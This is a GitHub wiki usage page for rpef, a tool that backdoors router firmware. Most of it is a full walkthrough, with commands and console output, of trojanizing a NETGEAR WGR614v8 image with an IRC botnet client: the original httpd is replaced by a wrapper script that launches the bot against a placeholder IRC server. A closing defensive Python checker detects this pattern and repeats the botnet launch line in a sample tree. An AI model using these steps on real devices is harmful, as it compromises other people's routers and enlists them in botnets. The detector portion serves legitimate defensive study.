Usage Documentation - mncoppola/rpef GitHub Wiki
Currently, the framework includes a number of firmware image modules, each tagged with one of the following statuses:
- 'Verified' - This module is confirmed to work and is stable.
- 'Unverified' - This module is believed to work or should work with little additional effort, but awaits being tested on a physical device.
- 'Testing' - This module is currently undergoing development and is unstable for the time being. Users should consider this module a "work in progress."
- 'Roadblock' - Issues have halted progress on this module for the time being. Certain unavailable utilities or significant reverse engineering work may be necessary.
For a list of options, run:

```
python rpef.py -h
```

For a list of all currently supported firmware targets, run:

```
python rpef.py -ll
```

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:

```
python rpef.py <firmware image> <output file> <payload>
```

and accepts a number of optional switches (see `-h`).
The `rules/` directory stores a hierarchy of `rules/<vendor>/<module>` directories. One module correlates to one firmware checksum (not to one specific router), since multiple routers have been observed to run the exact same firmware. Within each module is `properties.json`, which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The `payloads/` directory stores cross-compiled binaries ready for deployment, and the optional `dependencies/` directory stores miscellaneous files to aid the process.

The `utilities/` directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable `.py` module exists), and calculating checksums.

The `payloads_src/` directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.
To verbosely generate a firmware image for the WGR614v8 backdoored with a botnet client, run:

```
python rpef.py WGR614v8-V1.2.10_21.0.52NA.chk WGR614v8-V1.2.10_21.0.52NA_backdoor.chk botnet -v
```

And the process should proceed as follows:
```
[+] Verifying checksum
Calculated checksum: 38f238872cfb32844663a8a7d47e93d5
Matched target: NETGEAR WGR614v8 1.2.10NA (Verified)
[+] Extracting parts from firmware image
Step 1: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 58, Size 506252 -> /tmp/tmpnIWTqZ/headerkernel.bin
Step 2: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 506310, Size 3063844 -> /tmp/tmpnIWTqZ/filesystem.bin
[+] Unpacking filesystem
Step 1: unsquashfs-1.0 /tmp/tmpnIWTqZ/filesystem.bin -> /tmp/tmpnIWTqZ/extracted_fs
Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/filesystem.bin
created 317 files
created 32 directories
created 53 symlinks
created 0 devices
created 0 fifos
[+] Inserting payload
Step 1: Copy rules/NETGEAR/WGR614v8_1.2.10NA/payloads/botnet /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/botnet
Step 2: Move /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd.bak
Step 3: Touch /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
Step 4: Appendtext "#!/bin/msh
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #busticati
[+] INPUT REQUIRED, Prefix of bot nick: awesome
Step 5: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#busticati awesome &
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
Step 6: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
Step 7: Chmod 777 /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] Building filesystem
Step 1: mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpnIWTqZ/newfs.bin
Executing: utilities/mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/newfs.bin -b 65536 -root-owned -le
Creating little endian 2.1 filesystem on /tmp/tmpnIWTqZ/newfs.bin, block size 65536.
Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
Filesystem size 2995.07 Kbytes (2.92 Mbytes)
31.14% of uncompressed filesystem size (9616.55 Kbytes)
Inode table size 3317 bytes (3.24 Kbytes)
34.70% of uncompressed inode table size (9558 bytes)
Directory table size 3237 bytes (3.16 Kbytes)
52.41% of uncompressed directory table size (6176 bytes)
Number of duplicate files found 5
Number of inodes 404
Number of files 319
Number of fragments 30
Number of symbolic links 53
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 32
Number of uids 1
root (0)
Number of gids 0
[+] Gluing parts together
Step 1: Touch WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
Step 2: Appendfile /tmp/tmpnIWTqZ/headerkernel.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
Step 3: Appendfile /tmp/tmpnIWTqZ/newfs.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
[+] Padding image with null bytes
Step 1: Pad WGR614v8-V1.2.10_21.0.52NA_backdoor.chk to size 3575808 with 0 (0x00)
[+] Generating CHK header
Step 1: packet WGR614v8-V1.2.10_21.0.52NA_backdoor.chk rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
Executing: utilities/packet -k WGR614v8-V1.2.10_21.0.52NA_backdoor.chk -b rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt -i rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
[+] Removing temporary files
Step 1: Rmdir /tmp/tmpnIWTqZ/
```
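Seen from the other side, the "Inserting payload" phase above leaves a recognisable trace in the unpacked root filesystem: an ELF daemon in `/usr/sbin` turned into a shell-script wrapper, its original parked beside it as `<name>.bak`, and the wrapper chmod'ed to 777. The following checker is an added example and not part of rpef; the list of daemon directories it scans is an assumption, and `build_sample_rootfs` creates a throwaway tree that mirrors the transcript rather than a real firmware image.

```python
import os
import stat
import tempfile

ELF_MAGIC = b"\x7fELF"

def classify(path):
    """Classify a file by its leading bytes: 'elf', 'script' or 'other'."""
    with open(path, "rb") as f:
        head = f.read(4)
    if head == ELF_MAGIC:
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "other"

def scan_rootfs(root, daemon_dirs=("usr/sbin", "sbin", "usr/bin", "bin")):
    """Return (relative_path, reason) findings; daemon_dirs is an assumed list."""
    findings = []
    for d in daemon_dirs:
        base = os.path.join(root, d)
        if not os.path.isdir(base):
            continue
        for name in sorted(os.listdir(base)):
            path = os.path.join(base, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue  # busybox applet symlinks are expected; skip them
            rel = os.path.join(d, name)
            backup = path + ".bak"
            # Transcript pattern: daemon is now a script, original ELF parked as <name>.bak
            if classify(path) == "script" and os.path.isfile(backup) \
                    and classify(backup) == "elf":
                findings.append((rel, "ELF daemon replaced by script wrapper, original kept as .bak"))
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & stat.S_IWOTH:  # the transcript chmods the wrapper to 777
                findings.append((rel, "world-writable, mode %o" % mode))
    return findings

def build_sample_rootfs():
    """Constructed sample tree mirroring the transcript; not a real firmware."""
    root = tempfile.mkdtemp(prefix="rootfs_")
    sbin = os.path.join(root, "usr", "sbin")
    os.makedirs(sbin)
    with open(os.path.join(sbin, "httpd.bak"), "wb") as f:
        f.write(ELF_MAGIC + b"\x01\x01\x01" + b"\x00" * 9)  # stand-in for the real httpd
    os.chmod(os.path.join(sbin, "httpd.bak"), 0o755)
    with open(os.path.join(sbin, "httpd"), "w") as f:
        f.write("#!/bin/msh\n/usr/sbin/botnet 1.2.3.4 6667 \\#busticati awesome &\n/usr/sbin/httpd.bak\n")
    os.chmod(os.path.join(sbin, "httpd"), 0o777)
    return root
```

Point `scan_rootfs` at the directory `unsquashfs` produced from a suspect image; a clean firmware yields no findings, while the tree built by `build_sample_rootfs` reports both the wrapper and the loosened permissions on `usr/sbin/httpd`.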